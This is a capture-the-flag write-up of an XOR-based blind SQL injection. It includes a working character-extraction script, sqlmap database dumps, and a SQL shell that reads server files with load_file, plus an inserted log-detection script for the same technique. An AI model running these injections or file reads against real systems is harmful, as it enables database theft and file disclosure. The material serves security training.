Fuzzing the parameter here shows that a large set of symbols is filtered, but the login name shown for id=1 differs from the one shown for id=0.
So we consider an XOR-based boolean blind SQL injection.
Here is my script:
import requests

# Extract the comma-joined table names of the current database one character
# at a time. For each position a binary search over printable ASCII (32..127)
# is driven through the injected expression id=1^(ascii(substr(...))>mid):
# the XOR flips the effective id between 1 and 0, and the page shows a
# different login name for each, which acts as the boolean oracle.
flag = ""
for i in range(1, 2000):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        url = "http://*********/SQL%20Injection/?id=1^(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1})".format(i, mid)
        res = requests.get(url=url)
        # The login name in the response reveals which id the XOR produced,
        # i.e. whether the comparison held for this mid.
        if 'Taka' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # A space or DEL means we have run past the end of the string.
    if (mid == 32 or mid == 127):
        break
    flag = flag + chr(mid)
    print(flag)
This dumps the table names.
Dumping the column names
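A defender-side counterpart, added here and not part of the original write-up: detection logic that flags the XOR character-oracle pattern used by the script above when it appears in web access logs. The log format, client IPs and sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicators of the boolean-blind technique above: an XOR expression feeding a
# character oracle (ascii/substr), and references to schema metadata or
# file-reading primitives (information_schema, @@datadir, load_file).
XOR_ORACLE = re.compile(r"\^\s*\(.*\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I | re.S)
SCHEMA_OR_FILE = re.compile(r"information_schema|@@datadir|\bload_file\s*\(", re.I)
# Minimal combined-format access log parser (format assumed for this example).
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample traffic: one benign request, then the ~7 probes a binary
# search over ASCII 32..127 needs to recover a single character.
PAYLOAD = ("/SQL%20Injection/?id=1%5E(ascii(substr((select%20group_concat(table_name)"
           "%20from%20information_schema.tables%20where%20table_schema=database()),1,1))%3E{})")
SAMPLE_LOG = "\n".join(
    ['10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /SQL%20Injection/?id=1 HTTP/1.1" 200 512']
    + ['10.0.0.9 - - [01/Jan/2024:10:00:0{0} +0000] "GET {1} HTTP/1.1" 200 512'.format(n, PAYLOAD.format(mid))
       for n, mid in enumerate((80, 104, 116, 110, 107, 106, 105))]
    + ['10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /SQL%20Injection/?id=2 HTTP/1.1" 200 512'])

def classify(path):
    """Return the indicator names that fire on a percent-decoded request path."""
    decoded = unquote_plus(path)
    hits = []
    if XOR_ORACLE.search(decoded):
        hits.append("xor_char_oracle")
    if SCHEMA_OR_FILE.search(decoded):
        hits.append("schema_or_file_access")
    return hits

def analyse(log_text, burst=7):
    """Count indicator hits per client IP and return the suspicious ones.
    A single oracle request is weak evidence; a run of them from one IP
    (one binary search per extracted character) is the real signal, while any
    schema or file access is reported on its own."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        counts = per_ip.setdefault(m.group("ip"), {})
        for hit in classify(m.group("path")):
            counts[hit] = counts.get(hit, 0) + 1
    return {ip: c for ip, c in per_ip.items()
            if c.get("xor_char_oracle", 0) >= burst or c.get("schema_or_file_access", 0) > 0}

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```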
id,name,Host,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string,password_expired,password_last_changed,password_lifetime,account_locked,id,name,id,name,password
After a long run it dumped a pile of column names, but none of them is the flag we want, so we try sqlmap to dump the tables instead.
available databases [14]:
[*] information_schema
[*] lts
[*] mysql
[*] performance_schema
[*] qhr
[*] qzw
[*] sys
[*] syy
[*] tempdb
[*] Weikl
[*] wry
[*] wzx
[*] youki
[*] yoursql
It found 14 databases.
Database: Weikl
[2 tables]
+----------------+
| user |
| flag |
+----------------+
Database: mysql
[18 tables]
+----------------+
| user |
| columns_priv |
| db |
| engine_cost |
| event |
| func |
| general_log |
| help_keyword |
| help_topic |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| server_cost |
| servers |
| slow_log |
| tables_priv |
| time_zone |
+----------------+
Database: sys
[12 tables]
+----------------+
| session |
| version |
| host_summary |
| latest_file_io |
| metrics |
| processlist |
| sys_config |
| user_summary |
| x$host_summary |
| x$processlist |
| x$session |
| x$user_summary |
+----------------+
Database: syy
[1 table]
+----------------+
| usersql |
+----------------+
Database: tempdb
[1 table]
+----------------+
| user |
+----------------+
Database: wry
[1 table]
+----------------+
| dataform |
+----------------+
Database: wzx
[1 table]
+----------------+
| id |
+----------------+
Database: youki
[1 table]
+----------------+
| user |
+----------------+
Database: yoursql
[1 table]
+----------------+
| flag |
+----------------+
Here we find tables named flag, which is what we want.
Let's query the data.
Database: Weikl
Table: flag
[1 entry]
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| flag |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 0x253537253537253339253331253439253438253532253666253631253537253335253732253439253438253532253666253631253538253464253637253631253538253464253637253561253664253738253638253561253761253338253637253536253437253638253730253632253664253733253637253539253537253634253638253631253537253334253364 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Hex output.
Try converting it to a string.
I decoded it in Burp Suite (BP) here.
URL-decode it.
Then Base64-decode it.
That is not it; try the other one.
Database: yoursql
Table: flag
[1 entry]
+--------------------------------------------------------------------------------------------------------------------+
| flag |
+--------------------------------------------------------------------------------------------------------------------+
| 0x466c616773206172652073746f726564206173207465787420756e646572207468652064617461626173652073746f726167652070617468 |
+--------------------------------------------------------------------------------------------------------------------+
Obviously hexadecimal; convert the hex to a string.
Neither one is the flag.
But this one gives a hint.
We infer that the flag is stored as a txt file under the database's storage path, so we use sqlmap's interactive shell.
Here we use --sql-shell, because --os-shell could not determine the site's absolute path and therefore cannot be used.
>python3 sqlmap.py -u http://********/SQL%20Injection/?id=1 --sql-shell
select @@datadir
This gives the database storage path.
Read the file:
select load_file('/var/lib/mysql/flag.txt')
This returns the flag; Base64-decode its contents to get the final result.